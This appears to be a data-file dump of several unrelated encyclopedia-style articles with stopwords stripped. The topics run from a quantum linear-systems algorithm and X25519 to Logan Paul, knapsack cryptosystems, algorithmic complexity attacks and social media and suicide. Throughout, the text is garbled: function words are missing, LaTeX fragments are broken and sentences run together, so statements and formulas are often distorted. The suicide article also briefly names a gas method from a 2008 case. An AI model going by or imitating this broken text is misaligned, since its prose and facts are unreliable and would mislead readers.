{\displaystyle onto {\displaystyle \langle x|m|x\rangle first, algorithm represents vector {\displaystyle {\overrightarrow {b}}} quantum state form: {\displaystyle |b\rangle =\sum _{i\mathop 1}^{n}b_{i}|i\rangle next, hamiltonian simulation techniques used apply unitary operator {\displaystyle e^{iat}} {\displaystyle |b\rangle superposition different times {\displaystyle ability decompose {\displaystyle |b\rangle eigenbasis {\displaystyle find corresponding eigenvalues {\displaystyle \lambda _{j}} facilitated quantum phase estimation. state system decomposition approximately: {\displaystyle \sum _{j\mathop 1}^{n}\beta _{j}|u_{j}\rangle |\lambda _{j}\rangle {\displaystyle u_{j}} eigenvector basis {\displaystyle {\displaystyle |b\rangle =\sum _{j\mathop 1}^{n}\beta _{j}|u_{j}\rangle would like perform linear taking {\displaystyle |\lambda _{j}\rangle {\displaystyle c\lambda _{j}^{-1}|\lambda _{j}\rangle {\displaystyle normalizing constant. linear mapping operation unitary thus require number repetitions probability failing. after succeeds, uncompute {\displaystyle |\lambda _{j}\rangle register left state proportional {\displaystyle \sum _{i\mathop 1}^{n}\beta _{i}\lambda _{j}^{-1}|u_{j}\rangle =a^{-1}|b\rangle =|x\rangle {\displaystyle |x\rangle quantum-mechanical representation desired solution vector read components would require procedure repeated least times. however, often case interested {\displaystyle itself, rather expectation value linear operator acting mapping quantum-mechanical operator performing quantum measurement corresponding obtain estimate expectation value {\displaystyle \langle x|m|x\rangle this allows wide variety features vector extracted including normalization, weights different parts state space, moments without actually computing values solution vector explanation algorithm initialization firstly, algorithm requires matrix {\displaystyle hermitian converted unitary operator. case {\displaystyle hermitian, define {\displaystyle \mathbf ={\begin{bmatrix}0&amp;a\\a^{\dagger }&amp;0\end{bmatrix}}.} {\displaystyle hermitian, algorithm used solve {\displaystyle cy={\begin{bmatrix}b\\0\end{bmatrix}}.} obtain {\displaystyle y={\begin{bmatrix}0\\x\end{bmatrix}}} secondly, algorithm requires efficient procedure prepare {\displaystyle |b\rangle quantum representation assumed exists linear operator {\displaystyle take arbitrary quantum state {\displaystyle |\mathrm {initial} \rangle {\displaystyle |b\rangle efficiently algorithm subroutine larger algorithm given {\displaystyle |b\rangle input. error preparation state {\displaystyle |b\rangle ignored. finally, algorithm assumes state {\displaystyle |\psi _{0}\rangle prepared efficiently. where {\displaystyle |\psi _{0}\rangle :={\sqrt {2/t}}\sum _{\tau \mathop 0}^{t-1}\sin \left({\tfrac {\tau +{\tfrac {1}{2}}}{t}}\right)|\tau \rangle large {\displaystyle coefficients {\displaystyle |\psi _{0}\rangle chosen minimize certain quadratic loss function induces error {\displaystyle u_{\mathrm {invert} subroutine described below. hamiltonian simulation hamiltonian simulation used transform hermitian matrix {\displaystyle unitary operator, applied will. this possible s-sparse efficiently computable, meaning nonzero entries given index entries computed time o(s). under assumptions, quantum hamiltonian simulation allows {\displaystyle e^{iat}} simulated time {\displaystyle o(\log(n)s^{2}t)} {\displaystyle u_{\mathrm {invert} subroutine subroutine algorithm, denoted {\displaystyle u_{\mathrm {invert} defined follows incorporates phase estimation subroutine: prepare {\displaystyle |\psi _{0}\rangle ^{c}} register apply conditional hamiltonian evolution (sum) apply fourier transform register denote resulting basis states {\displaystyle |k\rangle ..., define {\displaystyle \lambda _{k}:=2\pi k/t_{0}} adjoin three-dimensional register state {\displaystyle |h(\lambda _{k})\rangle ^{s}:={\sqrt {1-f(\lambda _{k})^{2}-g(\lambda _{k})^{2}}}|\mathrm {nothing} \rangle ^{s}+f(\lambda _{k})|\mathrm {well} \rangle ^{s}+g(\lambda _{k})|\mathrm {ill} \rangle ^{s},} reverse steps 1–3, uncomputing garbage produced along way. phase estimation procedure steps allows estimation eigenvalues error {\displaystyle \epsilon ancilla register step necessary construct final state inverted eigenvalues corresponding diagonalized inverse register, functions called filter functions. states 'nothing', 'well' 'ill' used instruct loop body proceed; 'nothing' indicates desired matrix inversion taken place, 'well' indicates inversion taken place loop halt, 'ill' indicates part {\displaystyle |b\rangle ill-conditioned subspace algorithm able produce desired inversion. producing state proportional inverse requires 'well' measured, overall state system collapses desired state extended born rule. main loop body algorithm follows amplitude amplification procedure: starting {\displaystyle u_{\mathrm {invert} }b|\mathrm {initial} \rangle following operation repeatedly applied: {\displaystyle u_{\mathrm {invert} }br_{\mathrm {init} }b^{\dagger }u_{\mathrm {invert} }^{\dagger }r_{\mathrm {succ} {\displaystyle r_{\mathrm {succ} }=i-2|\mathrm {well} \rangle \langle \mathrm {well} {\displaystyle r_{\mathrm {init} }=i-2|\mathrm {initial} \rangle \langle \mathrm {initial} after repetition, {\displaystyle measured produce value 'nothing', 'well', 'ill' described above. this loop repeated {\displaystyle |\mathrm {well} \rangle measured, occurs probability {\displaystyle rather repeating {\displaystyle {\frac {1}{p}}} times minimize error, amplitude amplification used achieve error resilience using {\displaystyle o\left({\frac {1}{\sqrt {p}}}\right)} repetitions. scalar measurement after successfully measuring 'well' {\displaystyle system state proportional {\displaystyle \sum _{i\mathop 1}^{n}\beta _{i}\lambda _{j}^{-1}|u_{j}\rangle =a^{-1}|b\rangle =|x\rangle finally, perform quantum-mechanical operator corresponding obtain estimate value {\displaystyle \langle x|m|x\rangle time analysis classical efficiency best classical algorithm produces actual solution vector {\displaystyle {\overrightarrow {x}}} gaussian elimination, runs {\displaystyle o(n^{3})} time. s-sparse positive semi-definite, conjugate gradient method used find solution vector {\displaystyle {\overrightarrow {x}}} found {\displaystyle o(ns\kappa time minimizing quadratic function {\displaystyle |a{\overrightarrow {x}}-{\overrightarrow {b}}|^{2}} when summary statistic solution vector {\displaystyle {\overrightarrow {x}}} needed, case quantum algorithm linear systems equations, classical computer find estimate {\displaystyle {\overrightarrow {x}}^{\dagger }m{\overrightarrow {x}}} {\displaystyle o(n{\sqrt {\kappa }})} quantum efficiency runtime quantum algorithm solving systems linear equations originally proposed harrow shown {\displaystyle o(\kappa ^{2}\log n/\varepsilon {\displaystyle \varepsilon error parameter {\displaystyle \kappa condition number {\displaystyle this subsequently improved {\displaystyle o(\kappa \log ^{3}\kappa \log n/\varepsilon ^{3})} andris ambainis quantum algorithm runtime polynomial {\displaystyle \log(1/\varepsilon developed childs since algorithm maintains logarithmic scaling {\displaystyle sparse rank matrices, wossnig extended algorithm based quantum singular value estimation technique provided linear system algorithm dense matrices runs {\displaystyle o({\sqrt {n}}\log n\kappa ^{2})} time compared {\displaystyle o(n\log n\kappa ^{2})} standard algorithm. optimality important factor performance matrix inversion algorithm condition number {\displaystyle \kappa represents ratio {\displaystyle largest smallest eigenvalues. condition number increases, ease solution vector found using gradient descent methods conjugate gradient method decreases, {\displaystyle becomes closer matrix cannot inverted solution vector becomes less stable. this algorithm assumes singular values matrix {\displaystyle {\displaystyle {\frac {1}{\kappa case claimed run-time proportional {\displaystyle \kappa ^{2}} achieved. therefore, speedup classical algorithms increased {\displaystyle \kappa {\displaystyle \mathrm {poly} (\log(n))} run-time algorithm made poly-logarithmic {\displaystyle \kappa problems solvable qubits could solved poly(n) time, causing complexity class equal pspace. error analysis performing hamiltonian simulation, dominant source error, done simulating {\displaystyle e^{iat}} assuming {\displaystyle s-sparse, done error bounded constant {\displaystyle \varepsilon translate additive error achieved output state {\displaystyle |x\rangle phase estimation step errs {\displaystyle o\left({\frac {1}{t_{0}}}\right)} estimating {\displaystyle \lambda translates relative error {\displaystyle o\left({\frac {1}{\lambda t_{0}}}\right)} {\displaystyle \lambda ^{-1}} {\displaystyle \lambda \geq 1/\kappa taking {\displaystyle t_{0}=o(\kappa \varepsilon induces final error {\displaystyle \varepsilon this requires overall run-time efficiency increased proportional {\displaystyle o\left({\frac {1}{\varepsilon }}\right)} minimize error. experimental realization while exist quantum computer truly offer speedup classical computer, implementation "proof concept" remains important milestone development quantum algorithm. demonstrating quantum algorithm linear systems equations remained challenge years proposal 2013 demonstrated al., barz parallel. published physical review letters 110, 230501 (2013), reported experimental demonstration simplest meaningful instance algorithm, solving {\displaystyle 2\times linear equations various input vectors. quantum circuit optimized compiled linear optical network four photonic quantum bits (qubits) four controlled logic gates, used coherently implement every subroutine algorithm. various input vectors, quantum computer gives solutions linear equations reasonably high precision, ranging fidelities 0.825 0.993. barz february 2013, stefanie barz co-workers demonstrated quantum algorithm linear systems equations photonic quantum computing architecture. this implementation used consecutive entangling gates pair polarization-encoded qubits. separately controlled gates realized successful operation first heralded measurement ancillary photons. barz found fidelity obtained output state ranged 64.7% 98.1% influence higher-order emissions spontaneous parametric down-conversion. february 2013, reported proof-of-concept experimental demonstration quantum algorithm using 4-qubit nuclear magnetic resonance quantum information processor. implementation tested using simple linear systems variables. across three experiments obtain solution vector fidelity. another experimental demonstration using solving system reported 2018 using algorithm developed subaşı applications quantum computers devices harness quantum mechanics perform computations ways classical computers cannot. certain problems, quantum algorithms supply exponential speedups classical counterparts, famous example shor's factoring algorithm. exponential speedups known, (such quantum computers simulate quantum systems) found limited outside domain quantum mechanics. this algorithm provides exponentially faster method estimating features solution linear equations, problem ubiquitous science engineering, subroutine complex problems. electromagnetic scattering clader provided preconditioned version linear systems algorithm provided advances. first, demonstrated preconditioner could included within quantum algorithm. this expands class problems achieve promised exponential speedup, since scaling best classical algorithms polynomial condition number. second advance demonstration solve radar cross-section complex shape. this first examples solve concrete problem exponentially faster best known classical algorithm. linear differential equation solving dominic berry proposed algorithm solving linear time dependent differential equations extension quantum algorithm solving linear systems equations. berry provides efficient algorithm solving full-time evolution sparse linear differential equations quantum computer. finite element method finite element method uses large systems linear equations find approximate solutions various physical mathematical models. montanaro pallister demonstrate algorithm, applied certain problems, achieve polynomial quantum speedup. they suggest exponential speedup possible problems fixed dimensions, solution meets certain smoothness conditions. quantum speedups finite element method higher problems include solutions higher-order derivatives large spatial dimensions. example, problems many-body dynamics require solution equations containing derivatives orders scaling number bodies, problems computational finance, black-scholes models, require large spatial dimensions. least-squares fitting wiebe provide quantum algorithm determine quality least-squares continuous function used approximate discrete points extending quantum algorithm linear systems equations. number discrete points increases, time required produce least-squares using even quantum computer running quantum state tomography algorithm becomes large. wiebe find many cases, algorithm efficiently find concise approximation data points, eliminating need higher-complexity tomography algorithm. machine learning data analysis machine learning study systems identify trends data. tasks machine learning frequently involve manipulating classifying large volume data high-dimensional vector spaces. runtime classical machine learning algorithms limited polynomial dependence volume data dimensions space. quantum computers capable manipulating high-dimensional vectors using tensor product spaces thus perfect platform machine learning algorithms.the quantum algorithm linear systems equations applied support vector machine, optimized linear non-linear binary classifier. support vector machine used supervised machine learning, training already classified data available, unsupervised machine learning, data given system unclassified. rebentrost show quantum support vector machine used data classification achieve exponential speedup classical computers.in june 2018, zhao developed algorithm performing bayesian training deep neural networks quantum computers exponential speedup classical training quantum algorithm linear systems equations, providing also first general-purpose implementation algorithm cloud-based quantum computers. also differentiable programming references</t>
  </si>
  <si>
    <t>Stress–strength analysis</t>
  </si>
  <si>
    <t>stress–strength analysis analysis strength materials interference stresses placed materials, "materials" necessarily goods parts, entire system. stress-strength analysis tool used reliability engineering. environmental stresses distribution mean {\displaystyle \left(\mu _{x}\right)} standard deviation {\displaystyle \left(s_{x}\right)} component strengths distribution mean {\displaystyle \left(\mu _{y}\right)} standard deviation {\displaystyle \left(s_{y}\right)} overlap distributions probability failure {\displaystyle \left(z\right)} this overlap also referred stress-strength interference. reliability distributions stress strength follow normal distribution, reliability component determined following equation: {\displaystyle r=1-p(z)} {\displaystyle z=-{\frac {\mu _{y}-\mu _{x}}{\sqrt {s_{x}^{2}+s_{y}^{2}}}}} p(z) determined table statistical software package. also first-order reliability method references http://reliawiki.org/index.php/stress-strength_analysis http://www.engr.iupui.edu/me/courses/stressstrengthinterference.pdf</t>
  </si>
  <si>
    <t>X25519</t>
  </si>
  <si>
    <t>cryptography, curve25519 elliptic curve offering bits security (256 bits size) designed elliptic curve diffie–hellman (ecdh) agreement scheme. fastest curves covered known patents. reference implementation public domain software.the original curve25519 paper defined diffie–hellman (dh) function. daniel bernstein since proposed name curve25519 used underlying curve, name x25519 function. mathematical properties curve used 486662 {\displaystyle y^{2}=x^{3}+486662x^{2}+x} montgomery curve, prime field defined prime number {\displaystyle 2^{255}-19} uses base point {\displaystyle x=9} this point generates cyclic subgroup whose order prime 27742317777372353535851937790883648493 {\displaystyle 2^{252}+27742317777372353535851937790883648493} subgroup co-factor {\displaystyle meaning number elements subgroup {\displaystyle 1/8} elliptic curve group. using prime order subgroup prevents mounting pohlig–hellman algorithm attack.the protocol uses compressed elliptic point (only coordinates), allows efficient montgomery ladder ecdh, using coordinates.curve25519 constructed avoids many potential implementation pitfalls. design, immune timing attacks accepts 32-byte string valid public require validating given point belongs curve, generated base point. curve birationally equivalent twisted edwards curve used ed25519 signature scheme. history 2005, curve25519 first released daniel bernstein.in 2013, interest began increase considerably discovered potentially implemented backdoor p-256 curve based dual_ec_drbg algorithm. while directly related, suspicious aspects nist's curve constants concerns chosen values gave advantage breaking encryption. longer trust constants. believe manipulated relationships industry." since 2013, curve25519 become facto alternative p-256, used wide variety applications. starting 2014, openssh defaults curve25519-based ecdh gnupg adds support ed25519 keys signing encryption. behavior general protocol still standardized 2018.in 2017, nist announced curve25519 curve448 would added special publication 800-186, specifies approved elliptic curves federal government. both described 7748. 2019 draft "fips 186-5" notes intention allow usage ed25519 digital signatures. 2019 draft special publication 800-186 notes intention allow usage curve25519.in 2018, dkim specification amended allow signatures algorithm.also 2018, 8446 published transport layer security v1.3 standard. recommends support x25519, ed25519, x448, ed448 algorithms. libraries bouncy castle protocols omemo, proposed extension xmpp (jabber) secure shell signal protocol matrix (protocol) zcash transport layer security wireguard applications notes references external links official website</t>
  </si>
  <si>
    <t>Logan Paul</t>
  </si>
  <si>
    <t>logan alexander paul (born april 1995) american youtuber, social media personality, professional wrestler. currently signed wwe, performing brand. addition posting youtube channel, podcast impaulsive since november 2018, million subscribers youtube january 2022.paul gained following 2013, posting sketches video-sharing application vine. registered youtube channel, theofficialloganpaul, october 2013, started posting regularly following closure vine app. later created logan paul vlogs channel august 2015, since become most-subscribed youtube channel. january 2022, channel received 23.2 million subscribers billion views, ranking 74th most-subscribed channel united states, placing among most-subscribed channels platform.as actor, paul's television film work includes guest appearances order: special victims unit bizaardvark, roles films thinning (2016) thinning: world order (2018). also expanded content avenues; released debut single "2016" 2016 fought british youtuber rapper amateur white-collar boxing match 2018. fight ended majority draw. subsequent rematch, professional bout, paul lost split decision. paul involved several controversies, notably relation trip japan december 2017, visited aokigahara "suicide forest", filmed suicide victim, uploaded footage youtube channel. early life education paul grew ohio younger brother jake, also youtuber internet personality. paul began creating internet videos youtube channel called zoosh years old. attended westlake high school, achieving ranks plain dealer's all-star linebacker football team 2012, qualifying state-level ohio high school athletic association 2013 division wrestling individual championships. youtube career 2015–2017: youtube beginnings time paul attended college, youtube channel attained modest following platform vine. majored industrial engineering ohio university dropping 2014 pursue career full-time social media entertainer angeles, moving apartment complex angeles vine stars.paul rose fame member internet video sharing service vine. february 2014, million followers various social media platforms. april 2014 attained 105,000 twitter followers, 361,000 instagram followers, 31,000 likes facebook page 150,000 subscribers youtube channel. youtube compilation video vine work garnered four million views first week posted. 2015 ranked 10th influential figure vine, six-second videos earning hundreds thousands dollars advertising revenue. october, facebook videos alone million views. logan refers following "logang", portmanteau first name "gang".in early 2015, paul appeared order: special victims unit. also appeared series weird loners, appeared role paul twins. starred episodes freeform series stitchers. 2016, starred youtube movie thinning opposite peyton list. early 2016, paul trained drama coaches comedy troupes groundlings upright citizens brigade. paul wrote screenplay adult comedy, airplane mode, described "american paul "expendables internet stars". film originally planned released 2017, eventually released august 2019 delayed. also involved number advertising campaigns, including hanes, pepsico, hbo. 2016, comcast purchased short form digital series paul called logan paul vs.in february 2017, dwayne johnson released youtube channel, "logan paul from, like, rock's movies", video starring paul, johnson informs paul johnson's films, consoles paul making "ambassador" upcoming baywatch feature film. november 2017, paul released single, handlebars", track draws heavily interpolated sample song "handlebars" american alternative group flobots. song heavily criticized perceived sexual objectification women, including scene music video paul rides several women like bicycle. flobots frontman jamie laurie lambasted paul "sexist" lyrical content song unauthorized sample, calling face "douchebag entitlement". laurie would later release track lyrics deriding paul, titled "handle your bars". paul respond laurie's comments backlash towards handlebars"; however, since deleted song youtube. 2017–2018: suicide forest controversy december 2017, paul uploaded vlog youtube channel depicting recently deceased corpse died hanging aokigahara base mount fuji japan, known "suicide forest" infamy suicide site. initially intended part three "tokyo adventures" series, paul group planned camp woods, response finding corpse, decided notify authorities cancel plans. video gained million views within hours uploaded. paul's video depicting corpse group's reactions criticized celebrities politicians. addition, accused members youtube community insensitive suicide victims. also criticized misbehavior captured taking part trip, including climbing onto moving forklift tsukiji fish market, removing clothing crowded street, proceeding fight people traveling with, throwing giant poké ball passing citizens, including officer tokyo metropolitan police department. several petitions made change.org urging youtube delete paul's channel, largest received 720,000 signatures february 2018.as result backlash, paul removed video youtube channel, following written apology twitter january 2018. following day, january subsequent video apology released youtube paul describes behavior "coping mechanism", asking fans stop defending actions process. january youtube issued statement twitter account condemning paul's video. series tweets, said, "it's taken long time respond, we've listening everything saying. know actions creator affect entire community, we'll share soon steps we're taking ensure video like never circulated again." january youtube announced removing paul's channels google preferred, preferred program, world order, sequel youtube film thinning, placed hold, airing logan paul halted well. also season youtube series foursome role alec fixler terminated. metro-goldwyn-mayer also pulled schedule release musical film valley girl paul plays mickey bowen, following controversies. january paul seen reporters tmz. said learned mistakes believes treated "fairly". when asked whether deserves second chance, paul replied, "everyone deserves second chances, bro." response, donated million suicide prevention agencies, quarter going national suicide prevention lifeline. response controversy, paul hired mike majlak, former marketing manager furniture company lovesac, "make sure things happen" work logan help improve reputation. february paul officially returned daily vlogs youtube taking 3-week-long hiatus. youtube susan wojcicki said february paul violate youtube's three-strike policy meet criteria banned platform. wake controversy regarding suicide video, maverick apparel, brand juniors children, threatened paul legal action giving clothing line similar name ("maverick logan paul"), believing shoppers confusing line paul's, resulting deep decline sales. 2018–present: boxing, podcast, controversies february 2018, youtube suspended advertising paul's channels "pattern behavior", referring joke tweeted tide challenge, removing fish pond "jokingly give cpr", tasering dead rats. revenue temporarily halted result, result suspension, broadcast live twitch first time. weeks later, february youtube restored paul's channel; however, channel still 90-day "probation period" time content channel eligible youtube's trending tab.in january 2019, paul remarked impaulsive podcast, "what male-only march? we're gonna attempt month." received widespread criticism implying choice, lgbtq+ organization glaad responding paul's statement twitter, writing, "that's works, logan paul." march 2019, paul released described mockumentary exploring flat earth theory. video, interviewed many self-proclaimed "flat earthers", spoke 2018 flat earth international conference, took place denver, colorado. logan paul sued planeless pictures december 2020 aforementioned 2017 incident aokigahara, posted video including recently deceased suicide victim. planeless pictures accused posting video order escape movie deal would star write, produce film airplane mode. they also claimed video google suspending contract them, leaving million debt. 2021, paul competed fifth season masked singer "grandpa monster". unmasked second appearance clues foreshadowing boxing match floyd mayweather boxing career amateur career logan paul february 2018, following white collar amateur boxing match weller, british youtuber challenged paul boxing match. february 2018, announced paul brother would fighting younger brother, deji, white-collar boxing matches. fight ended majority draw, judges scoring fight even 57–57 third judge scoring 58–57 favor ksi. professional career logan paul september 2019, announced paul would making professional boxing debut rematch ksi, would broadcast exclusively dazn united states. fight scheduled take place november staples center. press conference rematch, paul stirred controversy accused five abortions, remarking, "five babies dead. might return favor kill you." received criticism abortion rights activists, described comment "horrific", anti-abortion activists came defense. paul responded stating, said something distasteful insensitive."the rematch, consisted three minute rounds, resulted split decision, judges scoring fight 57–54 56–55 ksi, judge scoring 56–55 favor paul. exhibition bouts mayweather paul december 2020, announced paul would face former five-division world champion floyd mayweather exhibition bout february 2021. fight postponed, took place june 2021 hard rock stadium miami gardens, florida. 2021, mayweather paul first time press conference hard rock stadium, latter's brother, jake paul, became involved angry brawl mayweather removed mayweather's head. visibly irate mayweather captured video saying, "i'll kill motherfucker! crazy? i'll fuck motherfucker. play motherfucking games. i'll fuck up."the bout consisted constant clinching initiated paul went full distance sound boos crowd, winner announced. mayweather's superior boxing reflected compubox punch stats, mayweather landed punches thrown (40.2%), compared paul's landed thrown (12.9%).in post-fight interview, mayweather praised opponent, saying: "he's better thought he's tough, rough competitor." paul appeared harbor doubt seriously mayweather taken fight, saying: "i'm going home thinking, 'did floyd survive?'" boxing record professional boxing record amateur boxing record exhibition boxing record professional wrestling career april 2021, episode smackdown, paul made debut, guest sami zayn carpet premiere documentary, zayn later inviting paul ringside match wrestlemania kevin owens. event, owens defeated zayn, paul celebrated owens, stunner owens. september episode smackdown, paul returned happy corbin's special guest show, paul helped corbin attack kevin owens. february 2022, episode raw, revealed paul miz's team partner take mysterio dominik mysterio wrestlemania event, paul defeated mysterios; however, match, attacked paul. june 2022, paul signed multi-event contract wwe. personal life paul english, irish, scottish, welsh, jewish, german ancestry. october 2015, paul lived apartment complex hollywood vine hollywood, california social media celebrities including amanda cerny, juanpa zurita, andrew bachelor, roommates mark dohner evan eckenrode. this proximity facilitated various collaborations respective videos. october 2017, paul eckenrode relocated estate encino, california. episode impaulsive, paul announced plan president united states, saying: "2032 first year run, it’s probably going grown-ass lots intelligence wisdom. around 2050-ish, let's call it." episode impaulsive guest carl lentz, pastor hillsong church time, paul discussed religion, described "not overly religious". paul also said christian. specified believes "creator", know creator's role would human's lives. episode garnered mockery toward paul, initially claimed jews believe jesus god, corrected. february 2021, paul announced would moving dorado, puerto rico angeles. stated high taxes california main motivator move. june 2021, made move currently living million mansion. health paul claims red–green colorblind. parodied criticized youtube personalities ethan klein idubbbz faking reactions video used color-corrective glasses first time. paul admits "embellished" "exaggerated reactions" glasses, added "did lie" impairment. paul revealed episode impaulsive tore cartilage knee football injury required stay school months. february 2019, paul claimed long-term brain damage, sustained playing high school football. claims daniel amen, doctor diagnosed him, says affects ability empathy human connection others. when filming video vine channel 2014, paul attempted stunt landed chair damaged right testicle. pay-per-view bouts boxing filmography film television podcast video games discography singles promotional singles guest appearances awards nominations references external links official website logan paul imdb boxing record logan paul boxrec (registration required)</t>
  </si>
  <si>
    <t>Algorithmic Number Theory Symposium</t>
  </si>
  <si>
    <t>algorithmic number theory symposium (ants) biennial academic conference, first held cornell 1994, constituting international forum presentation research computational number theory. they devoted algorithmic aspects number theory, including elementary number theory, algebraic number theory, analytic number theory, geometry numbers, arithmetic geometry, finite fields, cryptography. selfridge prize honour many contributions john selfridge mathematics, number theory foundation established prize awarded individuals authored best paper accepted presentation ants. prize, called selfridge prize, awarded every years even numbered year. prize winner(s) receive cash award sculpture. prize winners papers selected ants program committee are: 2006 ants werner bley robert boltje computation locally free class groups. 2008 ants viii juliana belding, reinier bröker, andreas enge kristin lauter computing hilbert class polynomials. 2010 ants john voight computing automorphic forms shimura curves fields arbitrary class number. 2012 ants andrew sutherland evaluation modular polynomials. 2014 ants fisher minimal models 6-coverings elliptic curves. 2016 ants steffen müller michael stoll computing canonical heights elliptic curves quasi-linear time. 2018 ants xiii michael musty, schiavone, jeroen sijsling john voight database belyĭ maps. 2020 ants jonathan love boneh supersingular curves small non-integer endomorphisms. 2022 ants harald helfgott lola thompson summing mu(n): faster elementary algorithm. proceedings prior ants refereed proceedings ants published springer lecture notes computer science (lncs). proceedings ants ants xiii, ants published mathematical sciences publishers open book series (obs). proceedings ants ants published special issue journal computation mathematics (jcm). proceedings ants published research number theory. conferences 1994: ants cornell university (ithaca, usa) lncs 1996: ants universite bordeaux (talence, lncs 1122 1998: ants reed college (portland, usa) lncs 1423 2000: ants universiteit leiden (leiden, lncs 1838 2002: ants university sydney (sydney, lncs 2369 2004: ants university vermont (burlington, usa) lncs 3076 2006: ants technische universität berlin (berlin, lncs 4076 2008: ants viii archived july 2012 wayback machine banff centre (banff, lncs 5011 2010: ants inria (nancy, lncs 6197 2012: ants university california, diego (san diego, usa) 2014: ants hotel hyundai (gyeongju, 2016: ants university kaiserslautern (kaiserslautern, –jcm 2018: ants xiii university wisconsin, madison (madison, usa) 2020: ants university auckland (auckland, nz)* 2022: ants university bristol (bristol, uk)*moved online covid-19. references external links ants site</t>
  </si>
  <si>
    <t>Knapsack cryptosystems</t>
  </si>
  <si>
    <t>knapsack cryptosystems cryptosystems whose security based hardness solving knapsack problem. they remain quite unpopular simple versions algorithms broken several decades. however, type cryptosystem good candidate post-quantum cryptography.the famous knapsack cryptosystem merkle-hellman public cryptosystem, first public cryptosystems, published year cryptosystem. however, system broken several attacks: shamir, adleman, density attack. however, exist modern knapsack cryptosystems considered secure far: among nasako-murakami 2006.knapsack cryptosystems, subject classical cryptoanalysis, believed difficult even quantum computers. that case systems rely factoring large integers, like rsa, computing discrete logarithms, like ecdsa, problems solved polynomial time shor's algorithm. references bibliography leonard adleman (1982), breaking titrated merkle-hellman public-key cryptosystem", crypto'82, springer: 303–308, doi:10.1007/978-1-4757-0602-4_29, isbn 978-1-4757-0604-8 shamir (1982), polynomial time algorithm breaking basic merkle-hellman cryptosystems", focs '82: 145–152, doi:10.1109/sfcs.1982.5 nasako; murakami (2006), high-density knapsack cryptosystem using combined trapdoor", japan society industrial applied mathematics, (4): 519–605, doi:10.11540/jsiamt.16.4_591</t>
  </si>
  <si>
    <t>Algorithmic complexity attack</t>
  </si>
  <si>
    <t>algorithmic complexity attack form computer attack exploits known cases algorithm used piece software exhibit worst case behavior. this type attack used achieve denial-of-service. examples billion laughs redos bomb also adversarial input quicksort popular fast in-place sorting algorithm, running {\displaystyle o(n\log average, {\displaystyle o(n^{2})} behaviour implemented naïvely. further reading mcilroy (1999). killer adversary quicksort" (pdf). archived (pdf) original 2010-07-14. retrieved 2010-06-16. scott crosby; wallach (2003). "denial service algorithmic complexity attacks". archived original 2007-02-02. retrieved 2010-06-16.</t>
  </si>
  <si>
    <t>Social media and suicide</t>
  </si>
  <si>
    <t>social media suicide phenomenon concerning social media's influence suicide-related behavior. suicide leading causes death worldwide, five causes death adolescents. globally, suicides account percent violent deaths among percent women. despite suicide prevention programs, therapy, pharmacological treatments, suicide rate either increasing remaining high around world. suicide identified individual phenomenon, also influenced social environmental factors. additionally, increasing evidence internet social media influence suicide-related behavior. internet become ingrained people's everyday lives, mental emotional damages individual increases individuals seeing edited version life supposed look. social media become commonly used part internet expanded exponentially throughout years. there variety sources accessible public various forms. sites include facebook, instagram, myspace, twitter, youtube, google+, snapchat, tiktok, vsco, more. these platforms intended allow people connect virtual way, lead cyberbullying, insecurity, emotional distress, ultimately suicide. bullying, whether social media elsewhere, physical not, significantly increases victims' risk suicidal behavior. since social media introduced people taken lives result cyberbullying, including people live-streamed suicide various social platforms. suicide rates among teenagers seen drastic increase 2007 2017 social media become prevalent life.another risk factor media accounts suicide romanticize dramatize description suicidal deaths, possibly leading increased number suicides. media tends popularize videos social media posts inform country rising trouble, create popular appeal young immature minds teenagers. social media could provide higher risks promotion different kinds pro-suicidal sites, message boards, chat rooms, forums. also, internet reports suicide incidents documents suicide methods (for example, suicide pacts, agreement people kill particular time often lethal means). role internet plays, particularly social media, suicide-related behavior topic growing interest. social media risks there substantial evidence internet social media influence suicide-related behavior. such evidence includes increase exposure graphic content well opportunity cyberbullying occur. over past years, cyberbullying increasingly self-harm suicide. april 2020 study done national center health statistics (nphc) revealed suicide second leading cause death citizens ages 10–34. although study directly state cause suicides, alluded cyberbullying potential cause. nphc previously done study 2018 showed adolescents victims cyberbullying became twice likely commit suicide cause various forms self harm. overall, teen suicide rates increased within past decade. this highly considerable public health problem, 40,000 suicide deaths united states nearly million suicide deaths worldwide occur yearly. social media’s influence suicide media portray suicidal behavior language potentially influence people suicidal tendencies. this include news reports actual suicides occurred television shows films reenact suicides. some organisations proposed guidelines media report suicide. there evidence compliance guidelines varies. some research found unclear whether guidelines successfully reduced number suicides. other research found guidelines worked cases. impact pro-suicidal sites, message boards, chat rooms forums social media platforms transformed traditional methods communication allowing instantaneous interactive sharing information created controlled individuals, groups, organizations, governments. third quarter 2015, facebook 1.55 billion monthly active users. immense quantity information topic suicide available internet social media. information available social media topic suicide influence suicidal behavior, negatively positively. social cognitive theory plays vital role suicide attempts influenced social media. this theory demonstrated influenced various processes form modeled behaviors. this shown people post suicide attempts online promote suicidal behavior general. contributors social media platforms also exert peer pressure encourage others take lives, idolize killed themselves, facilitate suicide pacts. these pro-suicidal sites reported following. example, japanese message board 2008, shared people kill using hydrogen sulfide gas. shortly people attempted suicide way, successful. biddle conducted systematic search suicide-associated terms (e.g., suicide, suicide methods, kill yourself, best suicide methods) analyze search results found pro-suicide sites chat rooms discussed general issues associated suicide often occurred within first hits search. also conducted study examined suicide-related sites found using internet search engines. website hits, suicide neutral, anti-suicide, pro-suicide. together, studies shown obtaining pro-suicide information internet, including detailed information suicide methods, easy.while social media prevalent young adult suicide, young adults find comfort solace platforms. young adults making connections people like situations helping feel less lonely. although, public opinion message boards harmful, following studies show point suicide prevention positive influences. study using content analysis analyzed postings suicide bulletin board months concluded contributions contained positive, empathetic, supportive postings. then, multi-method study able demonstrate users forums experience great deal social support small amount social strain. lastly, survey participants asked assess extent suicidal thoughts 7-level scale absolutely suicidal thoughts, strong suicidal thoughts) time directly first forum visit time survey. study found significant reduction using forum. study however cannot conclude forum reason decrease. together, studies show forums reduce number suicides. example social media play role suicide male adolescent arrived emergency department parents suspected medication ingestion attempted overdose. beforehand sent ex-girlfriend snapchat picture holding bottle acetaminophen, forwarded young male's parents. this picture used medical experts establish time ingestion, oral n-acetylcysteine discovered brought pediatric care facility, uneventful recovery psychiatric evaluation.in 2013, main cause nine teen suicides hateful anonymous messages ask.fm. cyberbullying suicide cyberbullying received considerable attention possible cause suicide. deemed major health concern affected teens major health threat affected psychological trauma inflicted perpetrators social media. while isn’t federal specific cyberbullying, states laws cyberbullying online harassment states criminal sanctions within laws. many states enhanced harassment laws include online harassment. criminal harassment statutes often provide basis bringing charges severe cases, serious criminal charges brought cases evidence indicates resultant suicide tragic consequences. civil remedies sought many cases criminal liability difficult prove.in 2006, year megan 